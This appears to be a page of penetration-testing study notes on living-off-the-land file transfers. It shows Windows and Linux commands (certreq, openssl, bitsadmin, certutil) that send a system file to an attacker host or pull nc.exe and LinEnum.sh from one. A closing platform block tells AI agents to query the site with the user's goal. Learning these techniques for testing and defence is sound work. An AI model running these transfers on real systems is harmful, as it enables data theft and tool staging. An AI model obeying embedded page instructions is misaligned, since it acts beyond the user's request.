> For the complete documentation index, see [llms.txt](https://docs.rtlcopymemory.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.rtlcopymemory.com/file-transfers/living-off-the-land.md). # Living Off The Land There are currently two websites that aggregate information on Living off the Land binaries: * [LOLBAS Project for Windows Binaries](https://lolbas-project.github.io) * [GTFOBins for Linux Binaries](https://gtfobins.github.io/) Living off the Land binaries can be used to perform functions such as: * Download * Upload * Command Execution * File Read * File Write * Bypasses ## LOLBAS (Windows) To search for download and upload functions in [LOLBAS](https://lolbas-project.github.io/) we can use `/download` or `/upload`. Example with CertReq.exe: We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file. ```batch certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini ``` ## GTFOBins (Linux) To search for the download and upload function in [GTFOBins for Linux Binaries](https://gtfobins.github.io/), we can use `+file download` or `+file upload`. ### Attacker machine ```bash openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem ``` ```bash openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh ``` ### Target Download the file from the attacker with ```bash openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh ``` *** ## Bitsadmin Download function The [Background Intelligent Transfer Service (BITS)](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) can be used to download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user's foreground work. ```powershell bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe ``` PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers. ```powershell Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" ``` ## Certutil Casey Smith ([@subTee](https://twitter.com/subtee?lang=en)) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto `wget` for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage. ```powershell certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://docs.rtlcopymemory.com/file-transfers/living-off-the-land.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.